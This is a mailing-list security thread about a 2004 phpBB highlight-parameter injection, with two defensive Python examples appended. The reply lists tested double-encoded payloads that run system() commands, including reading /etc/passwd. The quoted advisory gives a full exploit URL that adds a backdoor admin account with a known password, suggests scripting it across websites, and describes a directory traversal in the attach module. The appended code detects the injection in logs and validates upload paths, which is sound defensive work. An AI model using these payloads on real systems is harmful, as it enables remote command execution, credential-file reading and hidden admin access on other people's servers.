From: ntx0f at seteuid.com (ntx0f)
Subject: Re: Phpbb id: 10701 update and Attachmodule add-on Directory Traversal

Instead of just injecting mysql commands you can use system(); to virtually
execute any command you want.

Here are some examples I've already tested:

system(ls -l);
--------------
%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252echr(45)%252echr(108))
%252echr(59)%252e%2527

system(uname -a);
-----------------
%2527%252esystem(chr(117)%252echr(110)%252echr(97)%252echr(109)%252echr(101)
%252echr(32)%252echr(45)%252echr(97))%252echr(59)%252e%2527

system(id);
-----------
%2527%252esystem(chr(105)%252echr(100))%252echr(59)%252e%2527

system(/bin/cat /etc/passwd);
-----------------------------
%2527%252esystem(chr(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47)%2
52echr(99)%252echr(97)%252echr(116)%252echr(32)%252echr(47)%252echr(101)%252
echr(116)%252echr(99)%252echr(47)%252echr(112)%252echr(97)%252echr(115)%252e
chr(115)%252echr(119)%252echr(100))%252echr(59)%252e%2527

With the wrong permissions set, someone exploiting this vulnerability would
be able to overwrite anything.

----- Original Message -----
From: <zee@...bnc.it>
To: <bugtraq@...urityfocus.com>
Sent: Friday, November 26, 2004 2:23 PM
Subject: Phpbb id: 10701 update and Attachmodule add-on Directory Traversal


> Phpbb: All vulnerable except 2.0.11
> Attachment module: All versions vulnerable
>
> Howdark's update opened my eyes wide with his nice exploit:
>
> Bugtraq id: 10701
>
>  -----
> viewtopic.php?t=1&highlight=%2527
>  -----
>
> Looking at the code I saw that it was possible to inject any type of SQL
> query with multiple char() functions.
>
> The following code can add a username with admin rights by executing this
> query:
>
> INSERT INTO
> phpbb_users(user_id,user_active,username,user_password,user_level) VALUES
> ('99999','1','ze3lock','ba3c83348bddf7b368b478ac06d3340e','1')
>
> A new user with admin rights will be added to phpbb_users.
>
> *Note we can only execute a working query if we know the table names. If
> not, we can't. So this works only with a standard installation (usually 95%
> of websites ;-)
>
> username: ze3lock
> pass: thepass
>
> The exploit can be run without being logged in, and then you can have
> access with that username. So it's quite simple to make it part of a script
> that could make backdoors around the web.
>
> To make it work, just use the id of a working thread (in this case the
> thread is 30 - you can see it from the message)
>
>  --- Code start ----
>
>
http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr
>
(73)%252echr(78)%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32)
>
%252echr(73)%252echr(78)%252echr(84)%252echr(79)%252echr(32)%252echr(112)%25
>
2echr(104)%252echr(112)%252echr(98)%252echr(98)%252echr(95)%252echr(117)%252
>
echr(115)%252echr(101)%252echr(114)%252echr(115)%252echr(40)%252echr(117)%25
>
2echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)%252echr(100)%2
>
52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%2
>
52echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%2
>
52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%
>
252echr(97)%252echr(109)%252echr(101)%252echr(44)%252echr(117)%252echr(115)%
>
252echr(101)%252echr(114)%252echr(95)%252echr(112)%252echr(97)%252echr(115)%
>
252echr(115)%252echr(119)%252echr(111)%252echr(114)%252echr(100)%252echr(44)
>
%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(108
> )%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(
32
> )%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%
25
>
2echr(32)%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252ech
>
r(57)%252echr(57)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39
> )%252echr(44)%252echr(39)%252echr(122)%252echr(101)%252echr(51)%252echr(10
8)
>
%252echr(111)%252echr(99)%252echr(107)%252echr(39)%252echr(44)%252echr(39)%2
>
52echr(98)%252echr(97)%252echr(51)%252echr(99)%252echr(56)%252echr(51)%252ec
>
hr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)%252echr(100)%252echr
>
(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)%252echr(98
> )%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)%
25
>
2echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252ec
>
hr(101)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(
> 41))%252e%2527
>
>  --- code end ---
>
>  ------------ Attach Module ----------------
>
>
> In the attach module, I found a directory traversal in the "UPLOAD_DIR"
> field.
>
> This is the directory where all attachments are supposed to be uploaded.
>
> The field accepts any kind of character, so instead of 'files' you can put
> '../../' and all the attachments will be uploaded in the '../../' directory.
>
> That's a really dangerous defacement threat.
>
>
>  --------------- Suggestion ------------------
>
> Please, upgrade to version 2.0.11 and add input validation to the
> UPLOAD_DIR field in the attach module.
>
> Zeelock
>
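The requests in both messages share one shape: a double-URL-encoded `highlight` value (`%2527` becomes `%27` after the first decode and a quote after the second) that closes the PHP string and concatenates a function call built from `chr()` pieces. The scanner below is an added example for this archive page, not code from either poster or from phpBB. It reads Apache-style access log lines (the sample lines are constructed), decodes `highlight` a second time the way the vulnerable code effectively did, flags values that decode into a quote-then-call pattern, and renders the `chr()` runs back into readable strings so an analyst can see what was concatenated. The log format, the path suffix check and the list of function names are assumptions for the demo.

```python
"""Detection helper for the phpBB viewtopic.php 'highlight' injection pattern
discussed in this thread. Added example for this archive page; it is not code
from either poster or from phpBB. It scans Apache-style access log lines,
decodes the highlight parameter a second time (the bug relied on a
double-URL-encoded value surviving phpBB's own decoding) and flags values that
decode into PHP string concatenation followed by a function call."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines (not real traffic): a benign search, a
# system() injection in the style shown above, a bare quote probe, and an
# unrelated page request.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Nov/2004:14:23:01 +0100] "GET /forum/viewtopic.php?t=30&highlight=phpbb HTTP/1.1" 200 5120
203.0.113.7 - - [26/Nov/2004:14:25:10 +0100] "GET /forum/viewtopic.php?t=30&highlight=%2527%252esystem(chr(105)%252echr(100))%252echr(59)%252e%2527 HTTP/1.1" 200 5313
203.0.113.9 - - [26/Nov/2004:14:26:44 +0100] "GET /forum/viewtopic.php?t=1&highlight=%2527 HTTP/1.1" 200 4890
203.0.113.5 - - [26/Nov/2004:14:27:02 +0100] "GET /forum/index.php HTTP/1.1" 200 7011
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')
# PHP string concatenation that closes the quoted highlight value and calls
# a function: '.system( , '.mysql_query( and friends (assumed list).
INJECT_RE = re.compile(
    r"'\s*\.\s*(?:mysql_query|system|passthru|shell_exec|exec|eval)\s*\(", re.I)
CHR_RUN_RE = re.compile(r"chr\(\d+\)(?:\s*\.\s*chr\(\d+\))*")


def render_chr_runs(php_expr):
    """Replace runs of chr(N).chr(M)... with the string literal they build,
    so an analyst can read what was concatenated."""
    def to_literal(m):
        codes = re.findall(r"\d+", m.group(0))
        return repr("".join(chr(int(c)) for c in codes))
    return CHR_RUN_RE.sub(to_literal, php_expr)


def classify_highlight(once_decoded):
    """Classify a highlight value that has already been URL-decoded once (as
    the web server and phpBB would). Returns (category or None, fully decoded
    value). A value with no second encoding layer is treated as a normal
    search, so a legitimate apostrophe in a search term is not flagged."""
    twice = unquote(once_decoded)
    if twice == once_decoded:
        return None, twice
    if INJECT_RE.search(twice):
        return "code-injection", twice
    if "'" in twice:
        return "quote-probe", twice   # the bare %2527 test request
    return None, twice


def scan_log(text):
    """Return one finding per suspicious viewtopic.php highlight value."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        if not parts.path.endswith("/viewtopic.php"):
            continue
        for value in parse_qs(parts.query).get("highlight", []):
            category, decoded = classify_highlight(value)
            if category:
                findings.append({
                    "ip": line.split(" ", 1)[0],
                    "category": category,
                    "decoded": decoded,
                    "rendered": render_chr_runs(decoded),
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["category"], f["rendered"])
```

The double-decode signal (the once-decoded value still contains `%XX` sequences) is what separates these requests from a normal search containing an apostrophe, so the classifier checks that first and only then looks for the concatenation-plus-call pattern; the `quote-probe` category catches the bare `%2527` test request from the original advisory.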

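The suggested fix for the attach module is input validation on UPLOAD_DIR. The function below is an added example of what that validation should look like; it is not phpBB's or the attach module's code, and it is written in Python rather than PHP so it can be run as-is. It allow-lists each path segment (rejecting `..`, absolute paths, NUL bytes and backslashes) and then, as defence in depth, confirms the normalised result still sits under the forum's install directory. The forum root value is a constructed example.

```python
"""Allow-list validation for a configurable attachment directory such as the
attach module's UPLOAD_DIR discussed above. Added example for this page, not
phpBB's or the module's code. Pure string logic, so it runs offline and does
not touch the filesystem."""
import posixpath
import re

# One plain path segment: letters, digits, dot, dash, underscore; the
# negative lookahead rejects "." and "..".
SEGMENT_RE = re.compile(r"(?!\.{1,2}$)[A-Za-z0-9_.-]+$")


def check_upload_dir(forum_root, upload_dir):
    """Return (True, absolute_dir) if upload_dir is a relative path that stays
    inside forum_root, else (False, reason). forum_root is the absolute
    install directory (a constructed value in the demo below)."""
    if not upload_dir or upload_dir != upload_dir.strip():
        return False, "empty or padded value"
    if "\x00" in upload_dir or "\\" in upload_dir:
        return False, "NUL or backslash in path"
    if posixpath.isabs(upload_dir):
        return False, "absolute path not allowed"
    segments = [s for s in upload_dir.split("/") if s]
    if not segments:
        return False, "no path component"
    for seg in segments:
        if not SEGMENT_RE.match(seg):
            return False, "bad path segment %r" % seg
    # Defence in depth: even after the allow-list, confirm the normalised
    # result is still under forum_root.
    root = posixpath.normpath(forum_root)
    target = posixpath.normpath(posixpath.join(root, *segments))
    if target != root and not target.startswith(root + "/"):
        return False, "escapes forum root"
    return True, target


if __name__ == "__main__":
    # Constructed inputs: the module's default, a traversal like the one in
    # the advisory, a traversal hidden behind a valid prefix, and an absolute path.
    for value in ("files", "files/2004", "../../", "files/../../tmp", "/tmp"):
        print(repr(value), "->", check_upload_dir("/var/www/forum", value))
```

The string check does not resolve symlinks, so on the real filesystem the created directory should additionally be passed through `realpath()` (PHP has the same call) and compared against the install root again; the cheapest hardening of all is to accept only a fixed list of known directory names for this setting rather than free text.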
